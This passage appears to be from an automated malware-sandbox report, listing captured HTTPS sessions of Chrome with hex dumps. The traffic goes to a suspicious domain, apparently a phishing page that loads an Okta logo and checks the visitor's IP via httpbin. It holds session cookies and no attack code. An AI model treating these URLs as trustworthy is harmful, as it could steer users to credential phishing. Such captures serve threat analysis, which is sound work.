                                                              Data Ascii: |hJS}?_oyLa/;%Bj|K(SL]Fi3#zefuF1*<4(C.m*dh1/;p=r$k334RprqEPAVd$,mgXj5#zUQgF%a*lT\}iC777<x7|[9._HB'8v
                                                              2024-07-03 07:41:10 UTC1369INData Raw: 38 0e 09 c9 c9 88 4f 4e 46 cc e7 cf bc f5 65 8c 82 18 d1 1b a3 d7 f9 b5 59 a3 81 95 5f 55 f4 23 ed c0 c1 43 dc c8 5f 46 d0 ce bd 7d 7c b0 71 c3 06 ad 60 22 7b eb be a8 47 09 3c 7d f4 10 ae 6e 45 d1 ac 5d e7 4c 89 71 48 32 1a 72 9b fe cb 97 cf 08 6c da 0a b5 ea 35 94 03 87 1c 1c 43 d2 e3 92 ef 34 c9 9a 77 eb fa 15 7a 9b 9e 6c ef cb 28 24 5d 2d 21 78 b2 a0 4e 95 72 e4 f4 53 fc 32 55 92 21 cf b7 9c 23 56 cf 6f a4 4a 73 a4 58 d5 86 45 be ea 1a 61 cf 88 5e 25 c8 d5 aa ec 69 67 0b ef 82 05 e1 95 2f 1f 4a d8 d9 c1 c3 ce 16 2e 56 56 c8 65 92 b5 eb 52 39 0e af 92 92 f0 28 21 01 0f e3 13 70 f7 fd 7b 84 c7 c6 e1 71 fa 09 8e 6a 29 61 64 8d 18 d1 1b 99 c3 b5 60 ae 46 03 ab 16 f4 d1 b9 c8 a1 c3 86 71 c7 8e 1e a5 fd 8e 18 39 12 bd 7a f4 d0 0a 26 2d 5b b6 e4 22 23 25 47
                                                              Data Ascii: 8ONFeY_U#C_F}|q`"{G<}nE]LqH2rl5C4wzl($]-!xNrS2U!#VoJsXEa^%ig/J.VVeR9(!p{qj)ad`Fq9z&-["#%G
                                                              2024-07-03 07:41:10 UTC1369INData Raw: bb 15 23 7a c3 f6 9f 10 b4 d7 78 70 15 82 11 aa ea 10 fd e6 2d 17 18 50 0f 64 d6 4b ca 96 ad db 50 b6 8c 97 56 b1 b8 7e 23 9c eb 12 d2 99 f6 67 69 69 85 d1 53 e7 ca a9 1d 11 7e 8d 3e 8b 27 04 5e a3 4e 7d 04 34 6a 2e 97 03 9f 24 cc d9 b7 7d a3 e4 56 7f 31 4f 34 6b d7 29 53 0a 5d 52 87 6c bb 23 8b fa 64 4b 5e 1b 73 7c 4c 4c a6 1f 91 5b f5 3b ff 69 a9 2a 64 99 ea 93 85 77 13 e6 9e c3 f9 ab 92 0c 7a 65 4b 16 c4 da 3f 9b c0 2c 77 2e 95 64 a7 99 97 82 b9 7d 4b 5e b0 67 44 af 12 f4 74 cf fb 80 32 65 30 a0 6c 19 8d 57 d2 ab d6 b3 f2 b5 c9 b3 fb bf 23 ee 60 c5 dd 7b ca 37 12 59 4d 46 f4 22 73 a8 1e cc e1 65 80 d5 83 de 1a 75 f9 df a6 cd dc b4 a9 53 a8 8c 7a f5 02 f0 d7 5f 8b 74 82 43 fd c0 40 2e fa f5 6b da 6f df 61 a3 51 b8 88 3b e2 3f bc a7 b7 e9 9f 44 de 47 61
                                                              Data Ascii: #zxp-PdKPV~#giiS~>'^N}4j.$}V1O4k)S]Rl#dK^s|LL[;i*dwzeK?,w.d}K^gDt2e0lW#`{7YMF"seuSz_tC@.koaQ;?DGa
                                                              2024-07-03 07:41:10 UTC1369INData Raw: 23 5b e5 c8 6a fa d8 b7 92 63 74 49 29 ea 56 08 bd 82 4b a0 55 90 a7 90 e1 ce 52 37 6d dc b2 cf e8 88 11 7d f6 e1 40 08 9e 10 3d df 25 39 25 05 4f a3 62 f0 fa 4d 1c 3e 26 7d 42 4a 4a 2a f2 da 58 c1 3e bf 2d 8a 16 76 42 3e 5b 1b be bb a4 f2 12 53 52 30 fa e2 65 ec 7f fe 5c 2b f2 85 24 94 11 bd 90 bc 61 98 ba e8 9c e8 f4 05 d3 83 c8 48 ae 75 4b c9 fe f1 bc 79 6d b1 6d c7 0e b8 ba 38 eb c5 fe b9 7f fc c1 ad 5a b9 92 ea 62 63 6b 87 fe 3f 8f a1 09 72 64 0b 49 76 43 9e c3 df 8f b8 29 f7 39 59 57 d0 ad 5b 77 38 98 1e 43 ae 54 c3 7a 4e c9 99 58 22 d9 ae 0b ac ac f2 6b 05 77 46 f4 59 5f 5d 2e d6 56 f8 d3 af 26 aa 38 f0 7b e7 e7 65 f4 5b 5c bb fd 00 29 a9 69 d9 5e d6 c5 5c 9d e0 5b b6 24 34 38 4a 21 5b d9 c7 a3 5e e1 e7 f3 e7 91 90 fc 7d 07 88 be c6 17 6d f6 cb 88
                                                              Data Ascii: #[jctI)VKUR7m}@=%9%ObM>&}BJJ*X>-vB>[SR0e\+$aHuKymm8Zbck?rdIvC)9YW[w8CTzNX"kwFY_].V&8{e[\)i^\[$48J![^}m
                                                              2024-07-03 07:41:10 UTC1369INData Raw: ce 34 f9 1e 4c 93 1f 22 57 ca 53 5e 60 27 47 cc a6 99 97 40 9a 79 69 58 5b d9 09 02 57 46 f4 df 5d 5b b5 50 21 6c 69 50 9f 17 5f ff 28 e4 c0 c9 4b f8 f4 e5 fb 09 88 ca 76 e2 5f a5 3c 1c 0b 66 7f b6 82 b2 72 b2 aa 47 96 0c 04 ed 3f 80 07 1f c4 97 ff 9e 11 bd 26 91 c1 da 12 04 04 31 40 6b c3 15 09 89 49 5c ed 5a 7e 48 49 91 64 cd 5a b7 7e 03 7c 2b fa 88 d6 5e 65 31 fc f4 29 9e cb 95 f2 82 66 d5 33 49 7b 83 5c a9 af 15 37 35 31 05 97 2b 3f be e5 76 c2 b7 dc ce f8 96 bb 08 ac ac ed 05 87 25 23 fa ef ae 0c f6 28 8e d9 d5 ab 29 f6 ad 1a 35 ce 85 45 e0 f5 1b d5 b7 73 b6 ac 5f 13 66 66 b9 d5 e8 51 b9 26 7d 4f 9d 41 e8 cb 97 ca 55 36 a0 5a 8c e8 0d c8 59 02 55 55 70 83 35 5f 38 6d dd be 9d 9b 34 61 02 15 e7 e7 57 0b cb 97 2f 13 ad ad 9a 62 f6 29 29 96 33 e1 92 80
                                                              Data Ascii: 4L"WS^`'G@yiX[WF][P!liP_(Kv_<frG?&1@kI\Z~HIdZ~|+^e1)f3I{\751+?v%#()5Es_ffQ&}OAU6ZYUUp5_8m4aW/b))3
                                                              2024-07-03 07:41:10 UTC1369INData Raw: 0f ee dc 92 d6 f3 f6 f1 c1 46 b6 c5 4e 1c d1 aa c0 0a 46 f4 f2 00 cd aa 5e 15 1d 3c 54 df c3 be f7 f8 05 de 9e c7 ab 12 78 7e be 65 e1 5c a8 a0 2a 4d a4 75 ff bd 77 1f 53 af 85 a9 d5 56 e8 8d 18 d1 0b dd 43 c2 d7 cf 20 88 be 73 e7 10 2e 3c 5c 92 c3 da 2e 5f 7e b4 e9 dc 03 ee c5 b3 5f 51 7c ed e2 59 ec dd b6 51 8a 7e a7 ce 21 f8 75 fc 38 83 b0 55 f8 21 23 5c 0d 19 d1 cb fb 46 9d 13 ec 94 d9 1b af ad 08 28 e3 e9 0e f2 52 a7 90 8c 78 24 33 9e 18 0b 23 7a 31 7a 55 b7 36 09 9e fc 36 6d d9 c2 4d 9d 3c 99 a2 62 6a 6a 8a 3e 43 46 c2 d9 d5 4d 21 4a 61 97 ce 61 cf d6 0d d2 7a 5b b6 6e 43 d9 32 5e 82 b7 57 a1 61 ac 42 b6 08 30 a2 97 87 c6 3d af 0d 36 05 d6 87 b3 95 f2 e9 67 95 c9 76 a7 ad 10 54 37 b9 4e 64 7c 02 3a 1e 3d 86 77 59 3c be d3 96 ae ba 94 cb 88 5e 97 68
                                                              Data Ascii: FNF^<Tx~e\*MuwSVC s.<\._~_Q|YQ~!u8U!#\F(Rx$3#z1zU66mM<bjj>CFM!Jaaz[nC2^WaB0=6gvT7Nd|:=wY<^h


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              77192.168.2.662954188.114.96.34434156C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-07-03 07:41:09 UTC1469OUTGET /uvjwVVwGEKsrxbM6oO2WNguxpWDZE767qA3s6RHiwTp8DGWBbz5E0shyuHrSHEhUngh253 HTTP/1.1
                                                              Host: vkwek.ckyucle.com
                                                              Connection: keep-alive
                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                              sec-ch-ua-mobile: ?0
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                              sec-ch-ua-platform: "Windows"
                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                              Sec-Fetch-Site: same-origin
                                                              Sec-Fetch-Mode: no-cors
                                                              Sec-Fetch-Dest: image
                                                              Referer: https://vkwek.ckyucle.com/btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrs
                                                              Accept-Encoding: gzip, deflate, br
                                                              Accept-Language: en-US,en;q=0.9
                                                              Cookie: XSRF-TOKEN=eyJpdiI6IlZpT0pEZ00vemxEKzdZb0VNV1oyNEE9PSIsInZhbHVlIjoiUUZIcFpmeU1sZHZoR3VDZ052RU1MWG45aGMvTU1vcGpUcE9EQ25QVzF0QmpYU0U4QmxPRngzck5TUG1POVBTc0tNeUJMNGZ3WVd6VGVJcm1vRDFuNFJ0ekc5Q2xETnp6ODNOam8vNUdqNE11TWVBR3JTanYyTXl6YW1XWURhRFYiLCJtYWMiOiI0Y2IxNWQ5NjIxOTliYjllODJiN2Q5YjQ2NzEwZTEwYmNiYWQ0ZjEyYTg5ZjJhNTMwMmE4ODE5ZjIwZWNjYTc1IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlV2cjJOVjhqVmxzVVlXbVFCRTdXdXc9PSIsInZhbHVlIjoiL1lGNXNBNmQ2Wk5NUi9EVHkzRUhEZjVVR3paUktwMlM5cWpSMmpUTFNseWxYdUVjeFpzZHlyTS9JWVBFdzhxNmxWZldsdzZBNCtmcHpqQUJGMnlnZkRCYU1PMEdrN3lOZG9XUFNLV2hPUExLcy96S0NmbFdpTjdPQjJuTTAvREsiLCJtYWMiOiJkNzljNWY1NDI2ZmRmZGNhN2U2MjNkZWFmYWU3NTc0YzM4N2JhOTYyNDJkOTU5NWRhMDU0MDMxYzU5ZWNlYjE3IiwidGFnIjoiIn0%3D
                                                              2024-07-03 07:41:09 UTC662INHTTP/1.1 200 OK
                                                              Date: Wed, 03 Jul 2024 07:41:09 GMT
                                                              Content-Type: image/png
                                                              Content-Length: 70712
                                                              Connection: close
                                                              Content-Disposition: inline; filename="uvjwVVwGEKsrxbM6oO2WNguxpWDZE767qA3s6RHiwTp8DGWBbz5E0shyuHrSHEhUngh253"
                                                              CF-Cache-Status: DYNAMIC
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bkEW53PRKQWPAWtaISQNG3nwOum0rKU3LU%2B9KLG9o9791PWqeL7wdvR5YYmfdHuqUL2ulBt83DElz7FQvZ4lKEMuaVeI7DRMZMkX7ECzHRc8opx40jcFanbdb%2BCumA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              alt-svc: h3=":443"; ma=86400
                                                              Server: cloudflare
                                                              CF-RAY: 89d53b459ed0424b-EWR
                                                              2024-07-03 07:41:09 UTC707INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 09 8e 00 00 03 83 08 06 00 00 00 11 c6 07 ce 00 00 20 00 49 44 41 54 78 01 ec dd cf 71 e3 c6 b6 07 e0 09 c1 21 38 04 6f 6e 95 97 13 c2 ac df 7b 0b 87 a0 12 34 7b ef ef 7b 55 0a 41 21 78 e7 ed 84 a0 10 74 33 50 06 7e d5 53 38 36 0d 13 10 4e 13 7f 1a e0 37 55 53 4d 89 0d 10 f8 70 9a 22 1b 3f 82 9f 3e f9 47 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40
                                                              Data Ascii: PNGIHDR IDATxq!8on{4{{UA!xt3P~S86N7USMp"?>G @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
                                                              2024-07-03 07:41:09 UTC1369INData Raw: 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04
                                                              Data Ascii: @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
                                                              2024-07-03 07:41:09 UTC1369INData Raw: 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08
                                                              Data Ascii: @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
                                                              2024-07-03 07:41:09 UTC1369INData Raw: 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10
                                                              Data Ascii: @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
                                                              2024-07-03 07:41:09 UTC1369INData Raw: 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20
                                                              Data Ascii: @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
                                                              2024-07-03 07:41:09 UTC1369INData Raw: 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40
                                                              Data Ascii: @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
                                                              2024-07-03 07:41:09 UTC1369INData Raw: 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80
                                                              Data Ascii: @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
                                                              2024-07-03 07:41:09 UTC1369INData Raw: 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20
                                                              Data Ascii: @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
                                                              2024-07-03 07:41:09 UTC1369INData Raw: 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40
                                                              Data Ascii: @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
                                                              2024-07-03 07:41:09 UTC1369INData Raw: 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80
                                                              Data Ascii: @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              78192.168.2.6629573.227.135.84434156C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-07-03 07:41:09 UTC588OUTGET /ip HTTP/1.1
                                                              Host: httpbin.org
                                                              Connection: keep-alive
                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                              Accept: application/json, text/javascript, */*; q=0.01
                                                              sec-ch-ua-mobile: ?0
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                              sec-ch-ua-platform: "Windows"
                                                              Origin: https://vkwek.ckyucle.com
                                                              Sec-Fetch-Site: cross-site
                                                              Sec-Fetch-Mode: cors
                                                              Sec-Fetch-Dest: empty
                                                              Referer: https://vkwek.ckyucle.com/
                                                              Accept-Encoding: gzip, deflate, br
                                                              Accept-Language: en-US,en;q=0.9
                                                              2024-07-03 07:41:09 UTC248INHTTP/1.1 200 OK
                                                              Date: Wed, 03 Jul 2024 07:41:09 GMT
                                                              Content-Type: application/json
                                                              Content-Length: 30
                                                              Connection: close
                                                              Server: gunicorn/19.9.0
                                                              Access-Control-Allow-Origin: https://vkwek.ckyucle.com
                                                              Access-Control-Allow-Credentials: true
                                                              2024-07-03 07:41:09 UTC30INData Raw: 7b 0a 20 20 22 6f 72 69 67 69 6e 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 0a 7d 0a
                                                              Data Ascii: { "origin": "8.46.123.33"}


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              79192.168.2.66296013.33.187.684434156C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-07-03 07:41:09 UTC374OUTGET /fs/bcg/4/gfsh9pi7jcWKJKMAs1t7 HTTP/1.1
                                                              Host: ok4static.oktacdn.com
                                                              Connection: keep-alive
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                              Accept: */*
                                                              Sec-Fetch-Site: none
                                                              Sec-Fetch-Mode: cors
                                                              Sec-Fetch-Dest: empty
                                                              Accept-Encoding: gzip, deflate, br
                                                              Accept-Language: en-US,en;q=0.9
                                                              2024-07-03 07:41:09 UTC685INHTTP/1.1 200 OK
                                                              Content-Type: image/png
                                                              Content-Length: 10796
                                                              Connection: close
                                                              Date: Sun, 16 Jun 2024 04:04:47 GMT
                                                              Server: nginx
                                                              Last-Modified: Tue, 23 Feb 2021 04:20:08 GMT
                                                              ETag: "12bdacc832185d0367ecc23fd24c86ce"
                                                              Expires: Mon, 16 Jun 2025 04:04:47 GMT
                                                              Cache-Control: max-age=31536000
                                                              Cache-Control: public,max-age=31536000,s-maxage=1814400
                                                              Strict-Transport-Security: max-age=315360000; includeSubDomains
                                                              Access-Control-Allow-Origin: *
                                                              Accept-Ranges: bytes
                                                              X-Cache: Hit from cloudfront
                                                              Via: 1.1 a6ec089aa02839578670b49d128782c2.cloudfront.net (CloudFront)
                                                              X-Amz-Cf-Pop: FRA60-P9
                                                              X-Amz-Cf-Id: 7eePngIq9VDUQG9KBGki6OznCoBwi-yRGQxGM8doVNYyvVrxOsiNcw==
                                                              Age: 1481782
                                                              2024-07-03 07:41:09 UTC10796INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 a4 00 00 00 5e 08 06 00 00 00 6c 32 60 fe 00 00 29 f3 49 44 41 54 78 da ed 7d 09 9c 1c 55 9d ff a0 8b 20 77 a6 eb bd 1a 42 10 10 50 24 8a 48 76 09 c9 74 d5 ab ea 09 91 b8 a0 78 84 45 41 40 04 51 60 81 45 14 d0 15 02 88 c8 2d ec 8a 9c 22 97 28 e7 9f e5 58 60 89 11 44 2e c3 11 c8 35 5d 5d 55 7d cd 95 c9 9d 90 83 24 33 ff df af aa 26 e9 cc bc d7 67 75 4f 77 cf fb 7d 3e ef 13 98 99 ae 7e f5 8e df f7 77 ff 5a 5a 9a 84 12 7a eb be 96 d6 46 5a 24 49 92 24 49 92 a4 d1 a0 b8 4e fe b3 c7 a4 9d 09 9d ac 74 74 b2 24 65 90 c5 09 4d f9 c5 bc e9 ea ae 72 75 24 49 92 24 49 52 d5 68 81 41 76 4b 30 c5 74 19 b9 77 79 87 3a 98 31 e8 a0 a5 93 c1 44 ce 48 c3 cf d6 4c 53 07 01 98 92 69 46 7e b6 58 8f c4 e0 73 6d 72 f5 24
                                                              Data Ascii: PNGIHDR^l2`)IDATx}U wBP$HvtxEA@Q`E-"(X`D.5]]U}$3&guOw}>~wZZzFZ$I$INtt$eMru$I$IRhAvK0twy:1DHLSiF~Xsmr$


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              80192.168.2.6629623.227.135.84434156C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-07-03 07:41:09 UTC337OUTGET /ip HTTP/1.1
                                                              Host: httpbin.org
                                                              Connection: keep-alive
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                              Accept: */*
                                                              Sec-Fetch-Site: none
                                                              Sec-Fetch-Mode: cors
                                                              Sec-Fetch-Dest: empty
                                                              Accept-Encoding: gzip, deflate, br
                                                              Accept-Language: en-US,en;q=0.9
                                                              2024-07-03 07:41:10 UTC224INHTTP/1.1 200 OK
                                                              Date: Wed, 03 Jul 2024 07:41:10 GMT
                                                              Content-Type: application/json
                                                              Content-Length: 30
                                                              Connection: close
                                                              Server: gunicorn/19.9.0
                                                              Access-Control-Allow-Origin: *
                                                              Access-Control-Allow-Credentials: true
                                                              2024-07-03 07:41:10 UTC30INData Raw: 7b 0a 20 20 22 6f 72 69 67 69 6e 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 0a 7d 0a
